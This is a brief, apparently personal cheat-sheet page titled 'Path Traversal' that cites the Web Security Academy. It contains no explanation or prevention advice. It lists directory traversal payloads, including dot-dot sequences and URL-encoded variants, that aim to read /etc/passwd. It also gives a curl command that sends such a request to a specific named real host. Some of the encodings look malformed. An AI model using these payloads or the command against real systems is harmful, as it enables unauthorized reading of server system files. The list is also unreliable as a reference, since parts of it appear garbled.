Path Traversal

 What is directory traversal, and how to prevent it? | Web Security Academy

 

Path Traversal

-  .\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\/etc/passwd

- /../../../../../../../../../etc/passwd 

- https://www.website.com/%ae%2fetc%2fpasswd%2f

- https://wwww.website.com./etc/passwd

Cmd: curl --insecure -v https://nightly.ubnt.com//////etc/passwd

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Komentar